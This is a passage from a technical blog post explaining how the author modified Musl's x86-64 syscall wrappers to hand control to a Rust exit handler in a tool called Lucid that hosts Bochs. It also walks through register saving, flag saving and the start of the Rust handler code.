<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall4</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span>
						  <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">)</span><span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall5</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r8</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r8"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a5</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span>
						  <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r8</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r8</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r8"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a5</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r9</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r9"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a6</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span>
						  <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r8</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r9</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>For syscalls, there is a well defined calling convention. Syscalls take a “syscall number” which determines what syscall you want in <code class="language-plaintext highlighter-rouge">eax</code>, then the next n parameters are passed in via the registers in order: <code class="language-plaintext highlighter-rouge">rdi</code>, <code class="language-plaintext highlighter-rouge">rsi</code>, <code class="language-plaintext highlighter-rouge">rdx</code>, <code class="language-plaintext highlighter-rouge">r10</code>, <code class="language-plaintext highlighter-rouge">r8</code>, and <code class="language-plaintext highlighter-rouge">r9</code>.</p>

<p>This is pretty intuitive but the syntax is a bit mystifying, like for example on those <code class="language-plaintext highlighter-rouge">__asm__ __volatile__ ("syscall"</code> lines, it’s kind of hard to see what it’s doing. Let’s take the most convoluted function, <code class="language-plaintext highlighter-rouge">__syscall6</code> and break down all the syntax. We can think of the assembly syntax as a format string like for printing, but this is for emitting code instead:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">unsigned long ret</code> is where we will store the result of the syscall to indicate whether or not it was a success. In the raw assembly, we can see that there is a <code class="language-plaintext highlighter-rouge">:</code> and then <code class="language-plaintext highlighter-rouge">"=a(ret)"</code>, this first set of parameters after the initial colon is to indicate <em>output</em> parameters. We are saying please store the result in <code class="language-plaintext highlighter-rouge">eax</code> (symbolized in the syntax as <code class="language-plaintext highlighter-rouge">a</code>) into the variable <code class="language-plaintext highlighter-rouge">ret</code>.</li>
  <li>The next series of params after the next colon are <em>input</em> parameters. <code class="language-plaintext highlighter-rouge">"a"(n)</code> is saying, place the function argument <code class="language-plaintext highlighter-rouge">n</code>, which is the syscall number, into <code class="language-plaintext highlighter-rouge">eax</code> which is symbolized again as <code class="language-plaintext highlighter-rouge">a</code>. Next is store <code class="language-plaintext highlighter-rouge">a1</code> in <code class="language-plaintext highlighter-rouge">rdi</code>, which is symbolized as <code class="language-plaintext highlighter-rouge">D</code>, and so forth</li>
  <li>Arguments 4-6 are placed in registers above, for instance the syntax <code class="language-plaintext highlighter-rouge">register long r10 __asm__("r10") = a4;</code> is a strong compiler hint to store <code class="language-plaintext highlighter-rouge">a4</code> into <code class="language-plaintext highlighter-rouge">r10</code>. And then later we see <code class="language-plaintext highlighter-rouge">"r"(r10)</code> says input the variable <code class="language-plaintext highlighter-rouge">r10</code> into a general purpose register (which is already satisfied).</li>
  <li>The last set of colon-separated values are known as “clobbers”. These tell the compiler what our syscall is expected to corrupt. So the syscall calling convention specifies that <code class="language-plaintext highlighter-rouge">rcx</code>, <code class="language-plaintext highlighter-rouge">r11</code>, and memory may be overwritten by the kernel.</li>
</ul>

<p>With the syntax explained, we see what is taking place. The job of these functions is to translate the function call into a syscall. The calling convention for functions, known as the System V ABI, is different from that of a syscall, the register utilization differs. So when we call <code class="language-plaintext highlighter-rouge">__syscall6</code> and pass its arguments, each argument is stored in the following register:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">n</code> → <code class="language-plaintext highlighter-rouge">rax</code></li>
  <li><code class="language-plaintext highlighter-rouge">a1</code> → <code class="language-plaintext highlighter-rouge">rdi</code></li>
  <li><code class="language-plaintext highlighter-rouge">a2</code> → <code class="language-plaintext highlighter-rouge">rsi</code></li>
  <li><code class="language-plaintext highlighter-rouge">a3</code> → <code class="language-plaintext highlighter-rouge">rdx</code></li>
  <li><code class="language-plaintext highlighter-rouge">a4</code> → <code class="language-plaintext highlighter-rouge">rcx</code></li>
  <li><code class="language-plaintext highlighter-rouge">a5</code> → <code class="language-plaintext highlighter-rouge">r8</code></li>
  <li><code class="language-plaintext highlighter-rouge">a6</code> → <code class="language-plaintext highlighter-rouge">r9</code></li>
</ul>

<p>So the compiler will take those function args from the System V ABI and translate them into the syscall via the assembly that we explained above. So now these are the functions we need to edit so that we don’t emit that <code class="language-plaintext highlighter-rouge">syscall</code> instruction and instead call into Lucid.</p>

<h2 id="conditionally-calling-into-lucid">Conditionally Calling Into Lucid</h2>
<p>So we need a way in these function bodies to call into Lucid instead of emit <code class="language-plaintext highlighter-rouge">syscall</code> instructions. To do so we need to define our own calling convention, for now I’ve been using the following:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">r15</code>: contains the address of the global Lucid execution context</li>
  <li><code class="language-plaintext highlighter-rouge">r14</code>: contains an “exit reason” which is just an <code class="language-plaintext highlighter-rouge">enum</code> explaining why we are context switching</li>
  <li><code class="language-plaintext highlighter-rouge">r13</code>: is the base address of the register bank structure of the Lucid execution context, we need this memory section to store our register values to save our state when we context switch</li>
  <li><code class="language-plaintext highlighter-rouge">r12</code>: stores the address of the “exit handler” which is the function to call to context switch</li>
</ul>

<p>This will no doubt change some as we add more features/functionality. I should also note that it is the functions responibility to preserve these values according to the ABI, so the function caller expects that these won’t change during a function call, well we are changing them. That’s ok because in the function where we use them, we are marking them as clobbers, remember? So the compiler is aware that they change, what the compiler is going to do now is before it executes any code, it’s going to push those registers onto the stack to save them, and then before exiting, pop them back into the registers so that the caller gets back the expected values. So we’re free to use them.</p>

<p>So to alter the functions, I changed the function logic to first check if we have a global Lucid execution context, if we do not, then execute the normal Musl function, you can see that here as I’ve moved the normal function logic out to a separate function called <code class="language-plaintext highlighter-rouge">__syscall6_original</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6_original</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r8</span>  <span class="n">__asm__</span><span class="p">(</span><span class="s">"r8"</span><span class="p">)</span>  <span class="o">=</span> <span class="n">a5</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r9</span>  <span class="n">__asm__</span><span class="p">(</span><span class="s">"r9"</span><span class="p">)</span>  <span class="o">=</span> <span class="n">a6</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span> <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">),</span>
							<span class="s">"r"</span><span class="p">(</span><span class="n">r8</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r9</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>

	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="n">__syscall6_original</span><span class="p">(</span><span class="n">n</span><span class="p">,</span> <span class="n">a1</span><span class="p">,</span> <span class="n">a2</span><span class="p">,</span> <span class="n">a3</span><span class="p">,</span> <span class="n">a4</span><span class="p">,</span> <span class="n">a5</span><span class="p">,</span> <span class="n">a6</span><span class="p">);</span> <span class="p">}</span>
</code></pre></div></div>

<p>However, if we are running under Lucid, I set up our calling convention by explicitly setting the registers <code class="language-plaintext highlighter-rouge">r12-r15</code> in accordance to what we are expecting there when we context-switch to Lucid.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="n">__syscall6_original</span><span class="p">(</span><span class="n">n</span><span class="p">,</span> <span class="n">a1</span><span class="p">,</span> <span class="n">a2</span><span class="p">,</span> <span class="n">a3</span><span class="p">,</span> <span class="n">a4</span><span class="p">,</span> <span class="n">a5</span><span class="p">,</span> <span class="n">a6</span><span class="p">);</span> <span class="p">}</span>
	
    <span class="k">register</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r12</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r12"</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">exit_handler</span><span class="p">);</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r13</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r13"</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="o">&amp;</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">register_bank</span><span class="p">);</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r14</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r14"</span><span class="p">)</span> <span class="o">=</span> <span class="n">SYSCALL</span><span class="p">;</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r15</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r15"</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">g_lucid_ctx</span><span class="p">);</span>
</code></pre></div></div>

<p>Now with our calling convention set up, we can then use inline assembly as before. Notice we’ve replaced the <code class="language-plaintext highlighter-rouge">syscall</code> instruction with <code class="language-plaintext highlighter-rouge">call r12</code>, calling our exit handler as if it’s a normal function:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__asm__</span> <span class="nf">__volatile__</span> <span class="p">(</span>
        <span class="s">"mov %1, %%rax</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %2, %%rdi</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %3, %%rsi</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %4, %%rdx</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %5, %%r10</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %6, %%r8</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %7, %%r9</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="s">"call *%%r12</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="s">"mov %%rax, %0</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="o">:</span> <span class="s">"=r"</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
        <span class="o">:</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a2</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a4</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a5</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a6</span><span class="p">),</span>
		  <span class="s">"r"</span> <span class="p">(</span><span class="n">r12</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">r13</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">r14</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">r15</span><span class="p">)</span>
        <span class="o">:</span> <span class="s">"rax"</span><span class="p">,</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span>
    <span class="p">);</span>
	
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
</code></pre></div></div>

<p>So now we’re calling the exit handler instead of syscalling into the kernel, and all of the registers are setup <em>as if</em> we’re syscalling. We’ve also got our calling convention registers set up. Let’s see what happens when we land on the exit handler, a function that is implemented in Rust inside Lucid. We are jumping from Bochs code directly to Lucid code!</p>

<h2 id="implementing-a-context-switch">Implementing a Context Switch</h2>
<p>The first thing we need to do is create a function body for the exit handler. In Rust, we can make the function visible to Bochs (via our edited Musl) by declaring the function as an extern C function and giving it a label in inline assembly as such:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">extern</span> <span class="s">"C"</span> <span class="p">{</span> <span class="k">fn</span> <span class="nf">exit_handler</span><span class="p">();</span> <span class="p">}</span>
<span class="nd">global_asm!</span><span class="p">(</span>
    <span class="s">".global exit_handler"</span><span class="p">,</span>
    <span class="s">"exit_handler:"</span><span class="p">,</span>
</code></pre></div></div>

<p>So this function is what will be jumped to by Bochs when it tries to syscall under Lucid. The first thing we need to consider is that we need to keep track of Bochs’ state the way the kernel would upon entry to the context switching routine. The first thing we’ll want to save off is the general purpose registers. By doing this, we can preserve the state of the registers, but also unlock them for our own use. Since we save them first, we’re then free to use them. Remember that our calling convention uses <code class="language-plaintext highlighter-rouge">r13</code> to store the base address of the execution context register bank:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#[repr(C)]</span>
<span class="nd">#[derive(Default,</span> <span class="nd">Clone)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">RegisterBank</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">rax</span><span class="p">:</span>    <span class="nb">usize</span><span class="p">,</span>
    <span class="n">rbx</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="n">rcx</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">rdx</span><span class="p">:</span>    <span class="nb">usize</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">rsi</span><span class="p">:</span>    <span class="nb">usize</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">rdi</span><span class="p">:</span>    <span class="nb">usize</span><span class="p">,</span>
    <span class="n">rbp</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="n">rsp</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">r8</span><span class="p">:</span>     <span class="nb">usize</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">r9</span><span class="p">:</span>     <span class="nb">usize</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">r10</span><span class="p">:</span>    <span class="nb">usize</span><span class="p">,</span>
    <span class="n">r11</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="n">r12</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="n">r13</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="n">r14</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="n">r15</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We can save the register values then by doing this:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Save the GPRS to memory</span>
<span class="s">"mov [r13 + 0x0], rax"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x8], rbx"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x10], rcx"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x18], rdx"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x20], rsi"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x28], rdi"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x30], rbp"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x38], rsp"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x40], r8"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x48], r9"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x50], r10"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x58], r11"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x60], r12"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x68], r13"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x70], r14"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x78], r15"</span><span class="p">,</span>
</code></pre></div></div>

<p>This will save the register values to memory in the memory bank for preservation. Next, we’ll want to preserve the CPU’s flags, luckily there is a single instruction for this purpose which pushes the flag values to the stack called <code class="language-plaintext highlighter-rouge">pushfq</code>.</p>

<p>We’re using a pure assembly stub right now but we’d like to start using Rust at some point, that point is now. We have saved all the state we can for now, and it’s time to call into a real Rust function that will make programming and implementation easier. To call into a function though, we need to set up the register values to adhere to the function calling ABI remember. Two pieces of data that we want to be accessible are the execution context and the reason why we exited. Those are in <code class="language-plaintext highlighter-rouge">r15</code> and <code class="language-plaintext highlighter-rouge">r14</code> respectively remember. So we can simply place those into the registers used for passing function arguments and call into a Rust function called <code class="language-plaintext highlighter-rouge">lucid_handler</code> now.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Save the CPU flags</span>
<span class="s">"pushfq"</span><span class="p">,</span>

<span class="c1">// Set up the function arguments for lucid_handler according to ABI</span>
<span class="s">"mov rdi, r15"</span><span class="p">,</span> <span class="c1">// Put the pointer to the context into RDI</span>
<span class="s">"mov rsi, r14"</span><span class="p">,</span> <span class="c1">// Put the exit reason into RSI</span>

<span class="c1">// At this point, we've been called into by Bochs, this should mean that </span>
<span class="c1">// at the beginning of our exit_handler, rsp was only 8-byte aligned and</span>
<span class="c1">// thus, by ABI, we cannot legally call into a Rust function since to do so</span>
<span class="c1">// requires rsp to be 16-byte aligned. Luckily, `pushfq` just 16-byte</span>
<span class="c1">// aligned the stack for us and so we are free to `call`</span>
<span class="s">"call lucid_handler"</span><span class="p">,</span>
</code></pre></div></div>

<p>So now, we are free to execute real Rust code! Here is <code class="language-plaintext highlighter-rouge">lucid_handler</code> as of now:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// This is where the actual logic is for handling the Bochs exit, we have to </span>
<span class="c1">// use no_mangle here so that we can call it from the assembly blob. We need</span>
<span class="c1">// to see why we've exited and dispatch to the appropriate function</span>
<span class="nd">#[no_mangle]</span>
<span class="k">fn</span> <span class="nf">lucid_handler</span><span class="p">(</span><span class="n">context</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">,</span> <span class="n">exit_reason</span><span class="p">:</span> <span class="nb">i32</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// We have to make sure this bad boy isn't NULL </span>
    <span class="k">if</span> <span class="n">context</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span>
        <span class="nd">println!</span><span class="p">(</span><span class="s">"LucidContext pointer was NULL"</span><span class="p">);</span>
        <span class="nf">fatal_exit</span><span class="p">();</span>
    <span class="p">}</span>

    <span class="c1">// Ensure that we have our magic value intact, if this is wrong, then we </span>
    <span class="c1">// are in some kind of really bad state and just need to die</span>
    <span class="k">let</span> <span class="n">magic</span> <span class="o">=</span> <span class="nn">LucidContext</span><span class="p">::</span><span class="nf">ptr_to_magic</span><span class="p">(</span><span class="n">context</span><span class="p">);</span>
    <span class="k">if</span> <span class="n">magic</span> <span class="o">!=</span> <span class="n">CTX_MAGIC</span> <span class="p">{</span>
        <span class="nd">println!</span><span class="p">(</span><span class="s">"Invalid LucidContext Magic value: 0x{:X}"</span><span class="p">,</span> <span class="n">magic</span><span class="p">);</span>
        <span class="nf">fatal_exit</span><span class="p">();</span>
    <span class="p">}</span>

    <span class="c1">// Before we do anything else, save the extended state</span>
    <span class="k">let</span> <span class="n">save_inst</span> <span class="o">=</span> <span class="nn">LucidContext</span><span class="p">::</span><span class="nf">ptr_to_save_inst</span><span class="p">(</span><span class="n">context</span><span class="p">);</span>
    <span class="k">if</span> <span class="n">save_inst</span><span class="nf">.is_err</span><span class="p">()</span> <span class="p">{</span>
        <span class="nd">println!</span><span class="p">(</span><span class="s">"Invalid Save Instruction"</span><span class="p">);</span>
        <span class="nf">fatal_exit</span><span class="p">();</span>
    <span class="p">}</span>
    <span class="k">let</span> <span class="n">save_inst</span> <span class="o">=</span> <span class="n">save_inst</span><span class="nf">.unwrap</span><span class="p">();</span>

    <span class="c1">// Get the save area</span>
    <span class="k">let</span> <span class="n">save_area</span> <span class="o">=</span>
        <span class="nn">LucidContext</span><span class="p">::</span><span class="nf">ptr_to_save_area</span><span class="p">(</span><span class="n">context</span><span class="p">,</span> <span class="nn">SaveDirection</span><span class="p">::</span><span class="n">FromBochs</span><span class="p">);</span>

    <span class="k">if</span> <span class="n">save_area</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">||</span> <span class="n">save_area</span> <span class="o">%</span> <span class="mi">64</span> <span class="o">!=</span> <span class="mi">0</span> <span class="p">{</span>
        <span class="nd">println!</span><span class="p">(</span><span class="s">"Invalid Save Area"</span><span class="p">);</span>
        <span class="nf">fatal_exit</span><span class="p">();</span>
    <span class="p">}</span>

    <span class="c1">// Determine save logic</span>
    <span class="k">match</span> <span class="n">save_inst</span> <span class="p">{</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">XSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Retrieve XCR0 value, this will serve as our save mask</span>
            <span class="k">let</span> <span class="n">xcr0</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xgetbv</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="p">}</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>

            <span class="c1">// Call xsave to save the extended state to Bochs save area</span>
